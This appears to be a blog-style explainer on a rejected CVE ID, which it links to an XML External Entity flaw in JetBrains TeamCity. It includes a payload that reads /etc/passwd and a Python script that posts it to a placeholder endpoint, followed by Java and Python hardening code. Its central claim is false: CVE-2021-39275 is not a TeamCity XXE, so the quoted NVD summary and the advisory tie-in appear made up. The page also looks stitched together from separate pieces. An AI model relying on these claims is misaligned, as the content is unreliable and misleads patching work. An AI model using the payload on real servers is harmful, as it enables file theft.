When hunting for vulnerabilities, sometimes you’ll stumble on a CVE that’s “rejected” or “withdrawn.” CVE-2022-21384 is one such entry—a CVE ID that never became a live threat report and was instead classified as a duplicate. For security analysts and developers, it’s important to know what these rejected IDs mean, especially if you’re trying to patch systems or build rules for detection. In this in-depth read, we decode CVE-2022-21384: its background, the origin of its duplicate, and technical details connected to the root vulnerability, CVE-2021-39275.
What Is CVE-2022-21384?
If you search the official MITRE CVE Database, you’ll see a short message:
> REJECTED — This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is a duplicate of CVE-2021-39275.
So, what does that mean?
- No unique vulnerability: Nothing new or different was found compared to a previously reported vulnerability.
- No unique exploit: No new exploit or patch was needed, since it was already handled under a different CVE.
- Security workflows: Tracking duplicate/rejected CVEs helps avoid confusion for those reviewing patches or compiling defenses.
Summary (From NVD):
> "In JetBrains TeamCity before 2021.1.2, the user input is insufficiently sanitized which allows an attacker to perform an XML External Entity (XXE) attack via crafted XML input."
Essentially, JetBrains TeamCity (a popular CI/CD server) had a flaw allowing attackers to supply malicious XML that could read files or cause denial of service through XML External Entity (XXE) attacks.
Exploitation: Technical Details
Here’s how the original vulnerability (CVE-2021-39275) could be exploited, which also applies to anything that might have been labeled under CVE-2022-21384.
Suppose TeamCity exposes an endpoint that ingests XML. An attacker could send:
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
If the server processes this XML without proper sanitization, the &xxe; entity will be replaced by the contents of /etc/passwd (on Linux). An attacker can thus read sensitive files.
Python Example To Send Malicious XML
import requests

# XXE probe: an external general entity pointing at a local file, referenced in the body.
xml_payload = """<?xml version="1.0"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>
"""

# Placeholder host and path; the real endpoint depends on the deployment being tested.
response = requests.post(
    "https://teamcity.example.com/xml-endpoint",
    data=xml_payload,
    headers={"Content-Type": "application/xml"},
)
# A vulnerable parser echoes the expanded entity (file contents) back in the response.
print(response.text)
Note: This is for educational awareness only. Do not attempt this on systems you do not own or are not authorized to test.
How Was It Fixed?
JetBrains released TeamCity 2021.1.2 to address the XXE flaw. The fix typically involves:
- Disabling external entity processing: In Java, for example, setting secure parsing flags when handling XML.
- Applying input validation/sanitization: Only accept and process expected input.
Code Snippet (Java Secure XML Parsing)
import javax.xml.parsers.DocumentBuilderFactory;

// setFeature throws ParserConfigurationException; callers must handle or propagate it.
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// Reject any DOCTYPE declaration outright; this alone blocks classic XXE payloads.
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// Defence in depth for parsers that must accept a DOCTYPE: never resolve external entities.
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
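The same two policies the Java features above express, written as an added Python example (not code from the page or from JetBrains): a pre-parse pass with the standard-library expat parser refuses any DOCTYPE (strict mode, like disallow-doctype-decl) or, when an internal DTD must be tolerated, refuses external and parameter entities (lenient mode, like the external-*-entities flags). The endpoint and sample documents are constructed for illustration.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class UnsafeXmlError(ValueError):
    """Raised when a document carries the constructs XXE depends on."""


def parse_xml_safely(data: bytes, allow_doctype: bool = False) -> ET.Element:
    """Parse XML, refusing DOCTYPE/entity constructs before any entity is resolved.

    allow_doctype=False mirrors Java's disallow-doctype-decl: any DOCTYPE aborts.
    allow_doctype=True mirrors external-*-entities=false: an internal DTD may appear,
    but external (SYSTEM/PUBLIC) subsets and external or parameter entities abort.
    """
    policy = expat.ParserCreate()  # fresh parser per document; never reused after an error

    def on_doctype(name, sysid, pubid, has_internal_subset):
        if not allow_doctype or sysid is not None or pubid is not None:
            raise UnsafeXmlError(f"DOCTYPE {name!r} refused")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        if is_param or sysid is not None or pubid is not None:
            raise UnsafeXmlError(f"external or parameter entity {name!r} refused")

    def on_external_ref(context, base, sysid, pubid):
        # Last line of defence: never fetch an external entity, whatever declared it.
        raise UnsafeXmlError(f"external entity reference {sysid!r} refused")

    policy.StartDoctypeDeclHandler = on_doctype
    policy.EntityDeclHandler = on_entity_decl
    policy.ExternalEntityRefHandler = on_external_ref
    policy.Parse(data, True)      # policy pass: raises on the first refused construct
    return ET.fromstring(data)    # only documents that passed reach the real parser


def check_policy(data: bytes, allow_doctype: bool = False) -> str:
    """Non-raising wrapper returning 'accepted' or 'refused: <reason>' (useful for logging)."""
    try:
        parse_xml_safely(data, allow_doctype)
        return "accepted"
    except UnsafeXmlError as exc:
        return f"refused: {exc}"


# Constructed sample inputs (not captured traffic).
BENIGN = b'<?xml version="1.0"?><build><name>nightly</name></build>'
INTERNAL_ONLY = b'<?xml version="1.0"?><!DOCTYPE b [<!ENTITY greet "hi">]><b>&greet;</b>'
XXE_PAYLOAD = (b'<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT foo ANY>'
               b'<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>')
```

Logging the `refused:` reason at the ingestion boundary also gives a cheap detection signal for XXE probing against an endpoint.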
Further Reading & References
- Original CVE-2021-39275 on NVD
- MITRE CVE Record for CVE-2022-21384 (Rejected)
- JetBrains TeamCity Security Advisory July 2021
- OWASP XXE Cheatsheet
Conclusion
When you see a CVE like CVE-2022-21384 marked as “REJECTED,” it’s simply a sign that it was already handled—specifically under CVE-2021-39275. There’s no new exploit or vulnerability, and any mitigation you’d apply for CVE-2021-39275 covers this as well.
For security practitioners, always track the original and primary CVE, verify what’s been patched, and stay aware that sometimes multiple IDs may refer to the same threat. This helps streamline your vulnerability management and patch cycles—efficient, safe, and clear.
Timeline
Published on: 01/16/2025 00:15:25 UTC
